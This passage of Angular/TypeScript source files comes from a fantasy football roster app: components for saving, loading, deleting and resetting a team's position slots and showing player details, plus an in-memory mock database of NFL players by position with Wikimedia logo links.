.subscribe(player_array => {
this.player_array = player_array;
this.team = {id: team_id, name: team_name, created: team_date, players: this.player_array};
console.log(this.team);
// call addTeam method from team service and push team object into team array, call getTeams method from team service
this.teamService.addTeam(this.team)
.subscribe(team => {
this.teams.push(team);
});
this.teamService.getTeams()
.subscribe(teams => this.teams = teams);
console.log(this.teams);
alert("Team Saved!");
});
}
else {
alert("Please choose a complete team.");
this.router.navigate(['/']);
}
}
sendTeam(event: any) {
this.teamService.sendTeam(this.team);
}
loadTeam(event: any) {
// empty roster list
document.getElementById('roster_list').innerHTML = '';
console.log(this.teams);
// create table slots and delete buttons and place players
for (let i=0; i < this.team.players.length; i++) {
let load_player = this.renderer.createElement('li');
this.renderer.setAttribute(load_player, 'class','list-group-item');
this.renderer.setAttribute(load_player, 'id','p-' + (i + 1));
let id = this.team.players[i].id.toString();
let name = this.team.players[i].name;
let position = this.team.players[i].position;
let player_team = this.team.players[i].team;
let logo = this.team.players[i].logo;
let alt = this.team.players[i].alt;
let logo_element = this.renderer.createElement("img");
this.renderer.setAttribute(logo_element, 'src',logo);
this.renderer.setAttribute(logo_element, 'class','logo');
this.renderer.setAttribute(logo_element, 'alt',alt);
this.renderer.appendChild(load_player, logo_element);
let name_element = this.renderer.createElement('p');
let position_element = this.renderer.createElement('p');
let team_element = this.renderer.createElement('p');
this.renderer.setAttribute(name_element, 'id', id);
this.renderer.setAttribute(name_element, 'class','selected_player');
name_element.innerHTML = ' ' + name + ' ';
position_element.innerHTML = '-' + ' ' + position + ' ' + '-';
team_element.innerHTML = ' ' + player_team + ' ';
this.renderer.appendChild(load_player, name_element);
this.renderer.appendChild(load_player, position_element);
this.renderer.appendChild(load_player, team_element);
let delete_player = this.renderer.createElement('button');
let x = this.renderer.createText('x');
this.renderer.appendChild(delete_player, x);
this.renderer.appendChild(load_player, delete_player);
this.renderer.setAttribute(delete_player, 'id','p' + (i + 1) + '-del');
this.renderer.setAttribute(delete_player, 'class','delete_player');
let roster_list = document.getElementById('roster_list')
this.renderer.appendChild(roster_list, load_player);
}
// create empty slot in table when delete button is clicked
let p1_del = document.getElementById('p1-del');
let player_li = this.el.nativeElement.children[0];
this.renderer.listen(p1_del, 'click', (event) => {
let childElements = Array.from(player_li.children);
for (let child of childElements) {
this.renderer.removeChild(player_li, child);
}
let p = this.renderer.createElement('p');
let QB = this.renderer.createText('QB');
this.renderer.appendChild(p, QB)
this.renderer.appendChild(player_li, p);
});
let p2_del = document.getElementById('p2-del');
let player2_li = this.el.nativeElement.children[1];
this.renderer.listen(p2_del, 'click', (event) => {
let childElements = Array.from(player2_li.children);
for (let child of childElements) {
this.renderer.removeChild(player2_li, child);
}
let p = this.renderer.createElement('p');
let RB1 = this.renderer.createText('RB1');
this.renderer.appendChild(p, RB1)
this.renderer.appendChild(player2_li, p);
});
let p3_del = document.getElementById('p3-del');
let player3_li = this.el.nativeElement.children[2];
this.renderer.listen(p3_del, 'click', (event) => {
let childElements = Array.from(player3_li.children);
for (let child of childElements) {
this.renderer.removeChild(player3_li, child);
}
let p = this.renderer.createElement('p');
let RB2 = this.renderer.createText('RB2');
this.renderer.appendChild(p, RB2)
this.renderer.appendChild(player3_li, p);
});
let p4_del = document.getElementById('p4-del');
let player4_li = this.el.nativeElement.children[3];
this.renderer.listen(p4_del, 'click', (event) => {
let childElements = Array.from(player4_li.children);
for (let child of childElements) {
this.renderer.removeChild(player4_li, child);
}
let p = this.renderer.createElement('p');
let WR1 = this.renderer.createText('WR1');
this.renderer.appendChild(p, WR1)
this.renderer.appendChild(player4_li, p);
});
let p5_del = document.getElementById('p5-del');
let player5_li = this.el.nativeElement.children[4];
this.renderer.listen(p5_del, 'click', (event) => {
let childElements = Array.from(player5_li.children);
for (let child of childElements) {
this.renderer.removeChild(player5_li, child);
}
let p = this.renderer.createElement('p');
let WR2 = this.renderer.createText('WR2');
this.renderer.appendChild(p, WR2)
this.renderer.appendChild(player5_li, p);
});
let p7_del = document.getElementById('p7-del');
let player7_li = this.el.nativeElement.children[6];
this.renderer.listen(p7_del, 'click', (event) => {
let childElements = Array.from(player7_li.children);
for (let child of childElements) {
this.renderer.removeChild(player7_li, child);
}
let p = this.renderer.createElement('p');
let TE = this.renderer.createText('TE');
this.renderer.appendChild(p, TE)
this.renderer.appendChild(player7_li, p);
});
let p6_del = document.getElementById('p6-del');
let player6_li = this.el.nativeElement.children[5];
this.renderer.listen(p6_del, 'click', (event) => {
let childElements = Array.from(player6_li.children);
for (let child of childElements) {
this.renderer.removeChild(player6_li, child);
}
let p = this.renderer.createElement('p');
let WRT = this.renderer.createText('RB/WR/TE');
this.renderer.appendChild(p, WRT)
this.renderer.appendChild(player6_li, p);
});
}
deleteTeam(event: any) {
// this.teams = this.teams.filter(t => t !== this.team);
this.teamService.deleteTeam(this.team)
.subscribe();
this.teamService.getTeams()
.subscribe(teams => {
this.teams = teams;
this.team = this.teams.length == 0 ? null : this.teams[this.teams.length - 1];
});
console.log(this.teams);
alert("Team Deleted!");
}
resetTeam(event: any) {
// remove player elements and delete button for all positions, add text
let qb_li = this.el.nativeElement.children[0];
let qb_childElements = Array.from(qb_li.children);
for (let child of qb_childElements) {
this.renderer.removeChild(qb_li, child);
}
let qb_p = this.renderer.createElement('p');
let QB = this.renderer.createText('QB');
this.renderer.appendChild(qb_p, QB)
this.renderer.appendChild(qb_li, qb_p);
let rb1_li = this.el.nativeElement.children[1];
let rb1_childElements = Array.from(rb1_li.children);
for (let child of rb1_childElements) {
this.renderer.removeChild(rb1_li, child);
}
let rb1_p = this.renderer.createElement('p');
let RB1 = this.renderer.createText('RB1');
this.renderer.appendChild(rb1_p, RB1);
this.renderer.appendChild(rb1_li, rb1_p);
let rb2_li = this.el.nativeElement.children[2];
let rb2_childElements = Array.from(rb2_li.children);
for (let child of rb2_childElements) {
this.renderer.removeChild(rb2_li, child);
}
let rb2_p = this.renderer.createElement('p');
let RB2 = this.renderer.createText('RB2');
this.renderer.appendChild(rb2_p, RB2);
this.renderer.appendChild(rb2_li, rb2_p);
let wr1_li = this.el.nativeElement.children[3];
let wr1_childElements = Array.from(wr1_li.children);
for (let child of wr1_childElements) {
this.renderer.removeChild(wr1_li, child);
}
let wr1_p = this.renderer.createElement('p');
let WR1 = this.renderer.createText('WR1');
this.renderer.appendChild(wr1_p, WR1);
this.renderer.appendChild(wr1_li, wr1_p);
let wr2_li = this.el.nativeElement.children[4];
let wr2_childElements = Array.from(wr2_li.children);
for (let child of wr2_childElements) {
this.renderer.removeChild(wr2_li, child);
}
let wr2_p = this.renderer.createElement('p');
let WR2 = this.renderer.createText('WR2');
this.renderer.appendChild(wr2_p, WR2);
this.renderer.appendChild(wr2_li, wr2_p);
let te_li = this.el.nativeElement.children[6];
let te_childElements = Array.from(te_li.children);
for (let child of te_childElements) {
this.renderer.removeChild(te_li, child);
}
let te_p = this.renderer.createElement('p');
let TE = this.renderer.createText('TE');
this.renderer.appendChild(te_p, TE);
this.renderer.appendChild(te_li, te_p);
let wrt_li = this.el.nativeElement.children[5];
let wrt_childElements = Array.from(wrt_li.children);
for (let child of wrt_childElements) {
this.renderer.removeChild(wrt_li, child);
}
let wrt_p = this.renderer.createElement('p');
let WRT = this.renderer.createText('RB/WR/TE');
this.renderer.appendChild(wrt_p, WRT);
this.renderer.appendChild(wrt_li, wrt_p);
}
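// A hedged refactoring sketch (not part of the original component): the seven
// near-identical blocks above could be driven by one loop over slot labels,
// matching the child indices used throughout this class.
// private resetSlot(index: number, label: string) {
//   const li = this.el.nativeElement.children[index];
//   for (const child of Array.from(li.children)) {
//     this.renderer.removeChild(li, child);
//   }
//   const p = this.renderer.createElement('p');
//   this.renderer.appendChild(p, this.renderer.createText(label));
//   this.renderer.appendChild(li, p);
// }
// resetTeam would then reduce to:
//   ['QB', 'RB1', 'RB2', 'WR1', 'WR2', 'RB/WR/TE', 'TE']
//     .forEach((label, i) => this.resetSlot(i, label));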
}
<file_sep>
import { Component, OnInit } from '@angular/core';
import { Team } from '../shared/team';
import { TeamService } from "../services/team.service";
import { StatsService } from "../services/stats.service";
import { Router, ActivatedRoute, ParamMap } from '@angular/router';
@Component({
selector: 'app-teams',
templateUrl: './teams.component.html',
styleUrls: ['./teams.component.css']
})
export class TeamsComponent implements OnInit {
team: Team;
constructor(private teamService: TeamService, private route: ActivatedRoute, private statsService: StatsService ) { }
ngOnInit() {
this.teamService.currentTeam
.subscribe(team => this.team = team);
}
}
<file_sep>
import { Component, OnInit } from '@angular/core';
import { Router, ActivatedRoute, ParamMap } from '@angular/router';
import { Player } from '../shared/player';
import { PlayerService } from "../services/player.service";
import { StatsService } from "../services/stats.service";
@Component({
selector: 'app-playerdetail',
templateUrl: './playerdetail.component.html',
styleUrls: ['./playerdetail.component.css']
})
export class PlayerDetailComponent implements OnInit {
player: Player;
players: Player[];
stats: any;
numbers: any;
QB: boolean = false;
RB: boolean = false;
WR: boolean = false;
TE: boolean = false;
constructor(private route: ActivatedRoute, private playerService: PlayerService, private statsService: StatsService) { }
ngOnInit() {
this.getPlayer();
}
getPlayer(): void {
const id = +this.route.snapshot.paramMap.get('id');
console.log(id);
this.playerService.getPlayer(id)
.subscribe(player => {
this.player = player
this.statsService.searchPlayer(this.player.name)
.subscribe(stats =>
this.stats = stats);
this.statsService.getStats(this.player.name)
.subscribe(numbers =>
this.numbers = numbers);
this.getPosition();
this.playerService.getPlayersByPosition(this.player.position)
.subscribe(players => this.players = players);
});
}
getSmallPlayer(id): void {
this.playerService.getPlayer(id)
.subscribe(player => {
this.player = player
this.statsService.searchPlayer(this.player.name)
.subscribe(stats =>
this.stats = stats);
this.statsService.getStats(this.player.name)
.subscribe(numbers =>
this.numbers = numbers);
this.getPosition();
});
}
getPosition() {
if (this.player.position == "QB") {
this.QB = true;
}
else if (this.player.position == "RB") {
this.RB = true;
}
else if (this.player.position == "WR") {
this.WR = true;
}
else if (this.player.position == "TE") {
this.TE = true;
}
}
}
<file_sep>
import { InMemoryDbService } from 'angular-in-memory-web-api';
import { Player } from '../shared/player';
import { Team } from '../shared/team';
import { Injectable } from '@angular/core';
@Injectable({
providedIn: 'root'
})
export class InMemoryDataService implements InMemoryDbService {
createDb() {
const players = [
{id: 1, name : "<NAME>", position : "QB", team : "Carolina Panthers", logo : "https://upload.wikimedia.org/wikipedia/en/1/1c/Carolina_Panthers_logo.svg", alt : "Car"},
{id: 2, name : "<NAME>", position : "QB", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 3, name : "<NAME>", position : "QB", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 4, name : "<NAME>", position : "QB", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 5, name : "<NAME>", position : "QB", team: "Detroit Lions", logo : "https://upload.wikimedia.org/wikipedia/en/7/71/Detroit_Lions_logo.svg", alt : "Det"},
{id: 6, name : "<NAME>", position : "QB", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
{id: 7, name : "<NAME>", position : "QB", team: "New England Patriots", logo : "https://upload.wikimedia.org/wikipedia/en/b/b9/New_England_Patriots_logo.svg", alt : "NE"},
{id: 8, name : "<NAME>", position : "QB", team: "Atlanta Falcons", logo : "https://upload.wikimedia.org/wikipedia/en/c/c5/Atlanta_Falcons_logo.svg", alt : "Atl"},
{id: 9, name : "<NAME>", position : "QB", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 10, name : "<NAME>", position : "QB", team: "New York Giants", logo : "https://upload.wikimedia.org/wikipedia/commons/6/60/New_York_Giants_logo.svg", alt : "NYG"},
{id: 11, name : "<NAME>", position : "QB", team: "Oakland Raiders", logo : "https://upload.wikimedia.org/wikipedia/en/e/ec/Oakland_Raiders_logo.svg", alt : "Oak"},
{id: 12, name : "<NAME>", position : "QB", team: "Minnesota Vikings", logo : "https://upload.wikimedia.org/wikipedia/en/4/48/Minnesota_Vikings_logo.svg", alt : "Min"},
{id: 13, name : "<NAME>", position : "QB", team: "Dallas Cowboys", logo : "https://upload.wikimedia.org/wikipedia/commons/1/15/Dallas_Cowboys.svg", alt : "Dal"},
{id: 14, name : "<NAME>", position : "QB", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 15, name : "<NAME>", position : "QB", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 16, name : "<NAME>", position : "QB", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 17, name : "<NAME>", position : "QB", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 18, name : "<NAME>", position : "QB", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 19, name : "<NAME>", position : "QB", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 20, name : "<NAME>", position : "QB", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 21, name : "<NAME>", position : "QB", team: "Baltimore Ravens", logo : "https://upload.wikimedia.org/wikipedia/en/1/16/Baltimore_Ravens_logo.svg", alt : "Bal"},
{id: 22, name : "<NAME>", position : "QB", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 23, name : "<NAME>", position : "QB", team: "Buffalo Bills", logo : "https://upload.wikimedia.org/wikipedia/en/7/77/Buffalo_Bills_logo.svg", alt : "Buf"},
{id: 24, name : "<NAME>", position : "QB", team: "Arizona Cardinals", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/Arizona_Cardinals_logo.svg", alt : "Ari"},
{id: 25, name : "<NAME>", position : "RB", team: "Arizona Cardinals", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/Arizona_Cardinals_logo.svg", alt : "Ari"},
{id: 26, name : "<NAME>", position : "RB", team: "Baltimore Ravens", logo : "https://upload.wikimedia.org/wikipedia/en/1/16/Baltimore_Ravens_logo.svg", alt : "Bal"},
{id: 27, name : "<NAME>", position : "RB", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 28, name : "<NAME>", position : "RB", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 29, name : "<NAME>", position : "RB", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 30, name : "<NAME>", position : "RB", team: "Dallas Cowboys", logo : "https://upload.wikimedia.org/wikipedia/commons/1/15/Dallas_Cowboys.svg", alt : "Dal"},
{id: 31, name : "<NAME>", position : "RB", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
{id: 32, name : "<NAME>", position : "RB", team: "Atlanta Falcons", logo : "https://upload.wikimedia.org/wikipedia/en/c/c5/Atlanta_Falcons_logo.svg", alt : "Atl"},
{id: 33, name : "<NAME>", position : "RB", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 34, name : "<NAME>", position : "RB", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 35, name : "<NAME>", position : "RB", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 36, name : "<NAME>", position : "RB", team: "Buffalo Bills", logo : "https://upload.wikimedia.org/wikipedia/en/7/77/Buffalo_Bills_logo.svg", alt : "Buf"},
{id: 37, name : "<NAME>", position : "RB", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 38, name : "<NAME>", position : "RB", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 39, name : "<NAME>", position : "RB", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 40, name : "<NAME>", position : "RB", team: "Jacksonville Jaguars", logo : "https://upload.wikimedia.org/wikipedia/en/7/74/Jacksonville_Jaguars_logo.svg", alt : "Jac"},
{id: 41, name : "<NAME>", position : "RB", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 42, name : "<NAME>", position : "RB", team: "New York Jets", logo : "https://upload.wikimedia.org/wikipedia/en/6/6b/New_York_Jets_logo.svg", alt : "NYJ"},
{id: 43, name : "<NAME>", position : "RB", team : "Carolina Panthers", logo : "https://upload.wikimedia.org/wikipedia/en/1/1c/Carolina_Panthers_logo.svg", alt : "Car"},
{id: 44, name : "<NAME>", position : "RB", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 45, name : "<NAME>", position : "RB", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 46, name : "<NAME>", position : "RB", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 47, name : "<NAME>", position : "RB", team: "Oakland Raiders", logo : "https://upload.wikimedia.org/wikipedia/en/e/ec/Oakland_Raiders_logo.svg", alt : "Oak"},
{id: 48, name : "<NAME>", position : "RB", team: "Minnesota Vikings", logo : "https://upload.wikimedia.org/wikipedia/en/4/48/Minnesota_Vikings_logo.svg", alt : "Min"},
{id: 49, name : "<NAME>", position : "RB", team: "Cincinnati Bengals", logo : "https://upload.wikimedia.org/wikipedia/commons/8/81/Cincinnati_Bengals_logo.svg", alt : "Cin"},
{id: 50, name : "<NAME>", position : "RB", team: "New England Patriots", logo : "https://upload.wikimedia.org/wikipedia/en/b/b9/New_England_Patriots_logo.svg", alt : "NE"},
{id: 51, name : "<NAME>", position : "RB", team: "New England Patriots", logo : "https://upload.wikimedia.org/wikipedia/en/b/b9/New_England_Patriots_logo.svg", alt : "NE"},
{id: 52, name : "<NAME>", position : "RB", team: "Detroit Lions", logo : "https://upload.wikimedia.org/wikipedia/en/7/71/Detroit_Lions_logo.svg", alt : "Det"},
{id: 53, name : "<NAME>", position : "RB", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 54, name : "<NAME>", position : "RB", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 55, name : "<NAME>", position : "RB", team: "Washington Redskins", logo : "https://upload.wikimedia.org/wikipedia/en/6/63/Washington_Redskins_logo.svg", alt : "Was"},
{id: 56, name : "<NAME>", position : "RB", team: "Tennessee Titans", logo : "https://upload.wikimedia.org/wikipedia/en/c/c1/Tennessee_Titans_logo.svg", alt : "Ten"},
{id: 57, name : "<NAME>", position : "RB", team: "Buffalo Bills", logo : "https://upload.wikimedia.org/wikipedia/en/7/77/Buffalo_Bills_logo.svg", alt : "Buf"},
{id: 58, name : "<NAME>", position : "RB", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 59, name : "<NAME>", position : "RB", team: "Arizona Cardinals", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/Arizona_Cardinals_logo.svg", alt : "Ari" },
{id: 60, name : "<NAME>", position : "RB", team: "Miami Dolphins", logo : "https://upload.wikimedia.org/wikipedia/en/3/37/Miami_Dolphins_logo.svg", alt : "Mia"},
{id: 61, name : "<NAME>", position : "RB", team: "New York Giants", logo : "https://upload.wikimedia.org/wikipedia/commons/6/60/New_York_Giants_logo.svg", alt : "NYG"},
{id: 62, name : "<NAME>", position : "RB", team: "Tennessee Titans", logo : "https://upload.wikimedia.org/wikipedia/en/c/c1/Tennessee_Titans_logo.svg", alt : "Ten"},
{id: 63, name : "<NAME>", position : "RB", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 64, name : "<NAME>", position : "RB", team: "Buffalo Bills", logo : "https://upload.wikimedia.org/wikipedia/en/7/77/Buffalo_Bills_logo.svg", alt : "Buf"},
{id: 65, name : "<NAME>", position : "RB", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 66, name : "<NAME>", position : "RB", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 67, name : "<NAME>", position : "RB", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 68, name : "<NAME>", position : "RB", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 69, name : "<NAME>", position : "RB", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 70, name : "<NAME>", position : "RB", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 71, name : "<NAME>", position : "RB", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 72, name : "<NAME>", position : "RB", team: "Baltimore Ravens", logo : "https://upload.wikimedia.org/wikipedia/en/1/16/Baltimore_Ravens_logo.svg", alt : "Bal"},
{id: 73, name : "<NAME>", position : "RB", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 74, name : "<NAME>", position : "RB", team: "Denver Broncos", logo : "https://upload.wikimedia.org/wikipedia/en/4/44/Denver_Broncos_logo.svg", alt : "Den"},
{id: 75, name : "<NAME>", position : "RB", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 76, name : "<NAME>", position : "RB", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 77, name : "<NAME>", position : "RB", team: "Denver Broncos", logo : "https://upload.wikimedia.org/wikipedia/en/4/44/Denver_Broncos_logo.svg", alt : "Den"},
{id: 78, name : "<NAME>", position : "RB", team: "Oakland Raiders", logo : "https://upload.wikimedia.org/wikipedia/en/e/ec/Oakland_Raiders_logo.svg", alt : "Oak"},
{id: 79, name : "<NAME>", position : "WR", team: "New England Patriots", logo : "https://upload.wikimedia.org/wikipedia/en/b/b9/New_England_Patriots_logo.svg", alt : "NE"},
{id: 80, name : "<NAME>", position : "WR", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 81, name : "<NAME>", position : "WR", team: "Atlanta Falcons", logo : "https://upload.wikimedia.org/wikipedia/en/c/c5/Atlanta_Falcons_logo.svg", alt : "Atl"},
{id: 82, name : "<NAME>", position : "WR", team: "Houston Texans", logo : "https://upload.wikimedia.org/wikipedia/en/2/28/Houston_Texans_logo.svg", alt : "Hou"},
{id: 83, name : "<NAME>", position : "WR", team: "Chicago Bears", logo : "https://upload.wikimedia.org/wikipedia/commons/5/5c/Chicago_Bears_logo.svg", alt : "Chi"},
{id: 84, name : "<NAME>", position : "WR", team: "Cincinnati Bengals", logo : "https://upload.wikimedia.org/wikipedia/commons/8/81/Cincinnati_Bengals_logo.svg", alt : "Cin"},
{id: 85, name : "<NAME>", position : "WR", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 86, name : "<NAME>", position : "WR", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 87, name : "<NAME>", position : "WR", team: "Seattle Seahawks", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Seattle_Seahawks_logo.svg", alt : "Sea"},
{id: 88, name : "<NAME>", position : "WR", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 89, name : "<NAME>", position : "WR", team: "Tampa Bay Buccaneers", logo : "https://upload.wikimedia.org/wikipedia/en/a/a2/Tampa_Bay_Buccaneers_logo.svg", alt : "TB"},
{id: 90, name : "<NAME>", position : "WR", team: "New Orleans Saints", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/New_Orleans_Saints_logo.svg", alt : "NO"},
{id: 91, name : "<NAME>", position : "WR", team: "Indianapolis Colts", logo : "https://upload.wikimedia.org/wikipedia/commons/0/00/Indianapolis_Colts_logo.svg", alt : "Ind"},
{id: 92, name : "<NAME>", position : "WR", team: "Dallas Cowboys", logo : "https://upload.wikimedia.org/wikipedia/commons/1/15/Dallas_Cowboys.svg", alt : "Dal"},
{id: 93, name : "<NAME>", position : "WR", team: "Los Angeles Rams", logo : "https://upload.wikimedia.org/wikipedia/en/8/8b/NFL_Rams_logo.svg", alt : "LAR"},
{id: 94, name : "<NAME>", position : "WR", team: "Philadelphia Eagles", logo : "https://upload.wikimedia.org/wikipedia/en/8/8e/Philadelphia_Eagles_logo.svg", alt : "Phi"},
{id: 95, name : "<NAME>", position : "WR", team: "Arizona Cardinals", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/Arizona_Cardinals_logo.svg", alt : "Ari"},
{id: 96, name : "<NAME>", position : "WR", team: "Arizona Cardinals", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/Arizona_Cardinals_logo.svg", alt : "Ari"},
{id: 97, name : "<NAME>", position : "WR", team: "San Francisco 49ers", logo : "https://upload.wikimedia.org/wikipedia/commons/3/3a/San_Francisco_49ers_logo.svg", alt : "SF"},
{id: 98, name : "<NAME>", position : "WR", team: "Green Bay Packers", logo : "https://upload.wikimedia.org/wikipedia/commons/5/50/Green_Bay_Packers_logo.svg", alt : "GB"},
{id: 99, name : "<NAME>", position : "WR", team: "New York Jets", logo : "https://upload.wikimedia.org/wikipedia/en/6/6b/New_York_Jets_logo.svg", alt : "NYJ"},
{id: 100, name : "<NAME>", position : "WR", team: "Buffalo Bills", logo : "https://upload.wikimedia.org/wikipedia/en/7/77/Buffalo_Bills_logo.svg", alt : "Buf"},
{id: 101, name : "<NAME>", position : "WR", team: "New York Giants", logo : "https://upload.wikimedia.org/wikipedia/commons/6/60/New_York_Giants_logo.svg", alt : "NYG"},
{id: 102, name : "<NAME>", position : "WR", team: "Los Angeles Chargers", logo : "https://upload.wikimedia.org/wikipedia/en/7/72/NFL_Chargers_logo.svg", alt : "LAC"},
{id: 103, name : "<NAME>", position : "WR", team: "Cleveland Browns", logo : "https://upload.wikimedia.org/wikipedia/en/d/d9/Cleveland_Browns_logo.svg", alt : "Cle"},
{id: 104, name : "<NAME>", position : "WR", team: "Miami Dolphins", logo : "https://upload.wikimedia.org/wikipedia/en/3/37/Miami_Dolphins_logo.svg", alt : "Mia"},
{id: 105, name : "<NAME>", position : "WR", team: "Kansas City Chiefs", logo : "https://upload.wikimedia.org/wikipedia/en/e/e1/Kansas_City_Chiefs_logo.svg", alt : "KC"},
{id: 106, name : "<NAME>", position : "WR", team: "Minnesota Vikings", logo : "https://upload.wikimedia.org/wikipedia/en/4/48/Minnesota_Vikings_logo.svg", alt : "Min"},
{id: 107, name : "<NAME>", position : "WR", team: "Minnesota Vikings", logo : "https://upload.wikimedia.org/wikipedia/en/4/48/Minnesota_Vikings_logo.svg", alt : "Min"},
{id: 108, name : "<NAME>", position : "WR", team: "Detroit Lions", logo : "https://upload.wikimedia.org/wikipedia/en/7/71/Detroit_Lions_logo.svg", alt : "Det"},
{id: 109, name : "<NAME>", position : "WR", team: "Detroit Lions", logo : "https://upload.wikimedia.org/wikipedia/en/7/71/Detroit_Lions_logo.svg", alt : "Det"},
{id: 110, name : "<NAME>", position : "WR", team: "Pittsburgh Steelers", logo : "https://upload.wikimedia.org/wikipedia/commons/d/de/Pittsburgh_Steelers_logo.svg", alt : "Pit"},
